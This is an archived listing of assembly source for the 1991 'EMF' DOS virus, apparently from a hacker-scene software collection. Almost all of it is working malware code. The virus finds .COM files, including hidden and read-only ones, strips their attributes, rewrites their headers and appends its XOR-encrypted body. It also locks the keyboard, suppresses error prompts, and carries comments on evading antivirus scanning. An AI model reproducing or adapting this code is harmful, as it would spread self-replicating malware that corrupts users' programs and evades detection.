home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / ASM-E.ZIP / EMF.ASM < prev    next >
Assembly Source File  |  1991-11-13  |  12KB  |  272 lines

  1.  
  2. DATA SEGMENT
  3. ORG 100H
  4. DATA ENDS
  5.  
  6. ; The EMF virus (c)1991 by Lazarus Long, Inc.
  7. ;  The author assumes no responsibility for any damage incurred
  8. ;  from the execution of this file, intentional or not
  9. ;
  10.  
  11.  
  12. START:
  13.          JMP VIRUS_START 
  14.          
  15. ENCRYPT_BYTE DB 00H             ;Storage space for byte that ID string is
  16.                                 ;Encrypted by
  17.  
  18. ;------------------------------------------------------------------------------;
  19. ;The code from here to ENC_START is always unencrypted and SCAN would be able  ;
  20. ;to find it. Maybe a quick look at V2P7 would be in order (Hint,Hint!)         ;
  21. ;------------------------------------------------------------------------------;
  22.  
  23. VIRUS_START:
  24.          CALL NEXT_STEP
  25. NEXT_STEP:
  26.          POP BP                            ;All actions relative to BP,
  27.  
  28.          IN AL,21H                         ;Lock out keyboard
  29.          PUSH AX
  30.          OR AL,2
  31.          OUT 21H,AL
  32.  
  33.  
  34.          MOV CX,ENC_LENGTH                 ;Number of bytes to decrypt                                         ;cause offsets
  35.  
  36.          LEA SI,[BP+OFFSET ENC_START-NEXT_STEP] ;Offset of data to decrypt                                          ;change in infected files
  37.          MOV DL,[103H]                     ;Byte to decrypt with
  38.  
  39.          CALL CRYPT                        ;Decrypt main body of virus
  40.          CALL RESTORE_EIGHT
  41.          JMP SAVE_PSP                      ;Continue
  42.  
  43. INFECT:
  44.          CALL CRYPT_WRITE
  45.          MOV AH,40H
  46.          MOV DX,BP                       ;Starting from BP-3
  47.          SUB DX,3                        ;Which,convienently,is the start
  48.          MOV CX,ENC_END-108H             ;of our viral code
  49.          INT 21H                         ;Write all of virus
  50.          CALL CRYPT_WRITE                ;Return and continue
  51.          RET
  52.  
  53. CRYPT_WRITE:
  54.  
  55.          MOV CX,ENC_LENGTH                         ;Number of bytes to decrypt
  56.          LEA SI,[BP+ OFFSET ENC_START - NEXT_STEP] ;Address to start decryption
  57.          MOV DL,[0FBH]                             ;Byte to decrypt with
  58.          CALL CRYPT
  59.          RET
  60.  
  61. ;******************************************************************************;
  62. ;Call this with SI equal to address to XOR,and CX number of bytes to XOR       :
  63. ;                                                                              ;
  64. ;******************************************************************************;
  65. CRYPT:         
  66.          XOR BYTE PTR [SI],DL ;XOR it
  67.          INC SI               ;Increment XOR address
  68.          INC DL               ;Change encryption key,eh?
  69.          NOT DL               ;Reverse the key
  70.          LOOP CRYPT           ;Until CX=0
  71.          RET                  ;Then return                      
  72.  
  73. ;******************************************************************************;
  74. ; Save PSP                                                                     ;
  75. ;******************************************************************************;
  76.  
  77. ENC_START EQU $
  78. SAVE_PSP:
  79.          MOV AH,30H                        ;Get DOS version
  80.          INT 21H
  81.          CMP AL,2                          ;Lower than 2?
  82.          JNB ABOVE_2                       ;No,continue
  83.          CALL RESTORE_EIGHT
  84.          MOV SI,100H                       ;If so return
  85.          PUSH SI
  86.          RET 0FFFFH
  87.  
  88. ABOVE_2:
  89.          PUSH ES                           ;Save ES
  90.          MOV AX,3524H                      ;Get INT 24 address
  91.          INT 21H
  92.          MOV [BP+OLD_B-NEXT_STEP],BX       ;Save it
  93.          MOV [BP+OLD_E-NEXT_STEP],ES
  94.          MOV AH,25H                        ;Now set it to our own code
  95.          LEA DX,[BP+NEW_24-NEXT_STEP]
  96.          INT 21H
  97.          POP ES                            ;Restore ES
  98.  
  99.          MOV CX,128                      ;Number of bytes to save
  100.          MOV SI,80H                      ;From 80H.  ie the PSP
  101.          LEA DI,[BP+ENC_END-NEXT_STEP]   ;To the end of our code
  102.          PUSH DI                         ;Save location so we can restore the bytes
  103.          REP MOVSB                       ;Mov'em
  104.  
  105. ;------------------------------------------------------------------------------;                                                                              ;
  106. ; Find first .COM file that is either Hidden,read-only,system,or archive       ;
  107. ;------------------------------------------------------------------------------;
  108.  
  109.  
  110. FIND_FIRST:
  111.  
  112.          LEA DX,[BP+WILD_CARD-NEXT_STEP]  ;Offset of *.COM,00
  113.          MOV CX,27H                       ;Find ANY file that fits *.COM
  114.          MOV AH,4EH                       ;Find first matching file
  115.          INT 21H     
  116.          JC QUIT                          ;If no *.COM files found,quit
  117.          JMP SET_ATTRIBS
  118.  
  119. FIND_AGAIN:
  120.  
  121.          LEA DX,[BP+WILD_CARD-NEXT_STEP]   ;Offset of *.com
  122.          MOV AH,4FH                   ;Find next matching file
  123.          MOV CX,27H                   ;Archive,Hidden,Read-only,or System
  124.          INT 21H
  125.          JC QUIT                      ;No more files? Then exit
  126.  
  127. SET_ATTRIBS:
  128.          MOV AX,[096H]          ;Get time
  129.          AND AL,1EH             ;Are the seconds set to 60?
  130.          CMP AL,1EH             ;
  131.          JZ FIND_AGAIN          ;If so,assume this file is infected,find another
  132. ;------------------------------------------------------------------------------;
  133. ; Open file and infect it.                                                     ;
  134. ;                                                                              ;
  135. ;------------------------------------------------------------------------------;
  136.          MOV DX,9EH                  ;offset into DTA of filename
  137.          MOV AX,4301H                ;Set file attribs
  138.          XOR CX,CX                   ;To normal file
  139.          INT 21H
  140.          JC QUIT                     ;Some sort of error occured,exit now!
  141.          MOV AX,3D02H                ;Code for open file with read and write
  142.                                      ;access
  143.          INT 21H                     ;DX points to ASCIIZ string of filename
  144.          MOV CX,04                   ;Read four bytes
  145.          MOV BX,AX                   ;Save handle for future use
  146.          MOV DX,0ACH                 ;Set buffer to end of DTA
  147.          MOV AH,3FH                  ;Read from file
  148.          INT 21H
  149.          JMP MAKE_HEADER
  150.  
  151. QUIT:
  152.          JMP DONE
  153.  
  154. ;------------------------------------------------------------------------------;
  155. ; Infect .COM header so it jumps to our viral code                             ;
  156. ;------------------------------------------------------------------------------;
  157. MAKE_HEADER:
  158.          MOV [0F9H],[9AH]             ;Offset off file size in DTA
  159.          MOV [0F8H]B,0E9H             ;Code for absolute JMP
  160.          SUB WORD PTR [0F9H],2        ;Adjust it just a bit
  161.          MOV AX,4200H                 ;Set file pointer to beginning
  162.                                       ;of file to be infected
  163.          XOR CX,CX                    ;Zero out CX
  164.          XOR DX,DX                    ;Zero out DX
  165.          INT 21H
  166.          MOV AH,2CH                   ;Get time
  167.          INT 21H
  168.          ADD DL,[104H]                ;And add to what we had before
  169.          MOV [0FBH],DL                ;Save that value for our key
  170.          MOV AH,40H                   ;Write to file
  171.          MOV DX,0F8H                  ;Starting at F8 hex
  172.          MOV CX,04H                   ;Write eight bytes
  173.          INT 21H
  174.          
  175. ERROR:   
  176.          JC DONE                     ;Some sort of error?
  177.                                      ;If so,exit
  178. ;------------------------------------------------------------------------------;
  179. ; Attach our viral code to the end of the target .COM file                     ;
  180. ;                                                                              ;
  181. ;------------------------------------------------------------------------------;
  182.          MOV SI,0ACH                 ;Starting at A9h
  183.          MOV CX,04                   ;Mov eight bytes
  184.          LEA DI,[BP+ORIGINAL_EIGHT-NEXT_STEP];Where to save original eight bytes to
  185.          REP MOVSB                   ;Save infected files original eight bytes
  186.          MOV AX,4202H                ;Set file pointer to end of file
  187.                                      ;plus 1
  188.          XOR CX,CX                   ;Zero CX
  189.          MOV DX,1                    ;Make DX=1
  190.          INT 21H
  191.          CALL INFECT                    ;Encrypt code, write it to file,
  192.                                         ;Decrypt it,and return
  193. ;------------------------------------------------------------------------------;
  194. ; This restores the files original date and time                               ;
  195. ;------------------------------------------------------------------------------;
  196.  
  197.          MOV AX,5701H                   ;Restore original date and time
  198.          MOV CX,[96H]                   ;From what was read in earlier
  199.          MOV DX,[98H]                    
  200.          AND CX,0FFE0H
  201.          OR  CX,01EH                    ;Change seconds to 60
  202.          INT 21H
  203.          MOV AH,3EH                     ;Close that file
  204.          INT 21H
  205.          CALL RESTORE_ATTRIBS           ;Restore it's attributes
  206.  
  207. DONE:
  208. RESTORE_PSP:
  209.          PUSH DS                        ;Save the DS register
  210.          MOV DX,[BP+OLD_B-NEXT_STEP]W   ;Move the old INT 24's address
  211.          MOV DS,[BP+OLD_E-NEXT_STEP]W   ;so we can restore it
  212.          MOV AX,2524H                   ;Restore it
  213.          INT 21H
  214.          POP DS                         ;Restore the DS register
  215.          POP SI                         ;SI is equal to address we stored
  216.                                         ;our PSP at
  217.          MOV DI,80H                     ;Want to move saved PSP to 80h
  218.          MOV CX,128                     ;Want to move 128 bytes
  219.          REP MOVSB
  220.          MOV SI,100H                    ;Odd sort of jump
  221.          POP AX
  222.          PUSH SI                        ;Ends up restoring control to
  223.                                         ;100h
  224.          OUT 21H,AL                     ;Unlock keyboard
  225.          RET 0FFFFH                     ;Pop off all of stack
  226.  
  227.  RESTORE_EIGHT:        
  228.          LEA SI,[BP+ORIGINAL_EIGHT-NEXT_STEP]  ;Restore original eight bytes so we
  229.                                                ;can RET
  230.          MOV DI,100H                           ;Destination of move
  231.          MOV CX,04                             ;Move eight bytes
  232.          REP MOVSB
  233.          RET
  234.  
  235. RESTORE_ATTRIBS:
  236. ;------------------------------------------------------------------------------;
  237. ; This routine restores the files original attributes.                         ;
  238. ;------------------------------------------------------------------------------;        
  239.          MOV AX,4301H                   ;Restore original attribs
  240.          XOR CX,CX                      ;Zero out CX
  241.          MOV CL,[95H]                   ;To what was read in earlier
  242.          MOV DX,09EH                    ;Offset of filename
  243.          INT 21H
  244.          RET
  245.  
  246. NEW_24:
  247.          XOR AX,AX                      ;Any error will simply be ignored
  248.          STC                            ;Most useful for write protects
  249.          IRET
  250.  
  251.  
  252.  
  253. OLD_E EQU $
  254. OLD_ES DW 00 00
  255. OLD_B EQU $
  256. OLD_BX DW 00 00
  257.  
  258. ORIGINAL_EIGHT EQU $
  259. OLD_EIGHT_BYTES  DB ,0CDH,20H,00,00      ;Bytes that are moved
  260.                                                      ;and RET'd to
  261. WILD_CARD EQU $
  262. FILESPEC         DB '*.COM',00
  263.  
  264. ;------------------------------------------------------------------------------
  265. ;This is just some generic text. Don't be a lamer and change the text and claim
  266. ;it was your own creation.
  267. ;------------------------------------------------------------------------------
  268. TEXT DB 'Screaming Fist (c)10/91'
  269. ENC_END EQU $
  270.  
  271. ENC_LENGTH = ENC_END - ENC_START              ;Length of code to be encrypted
  272.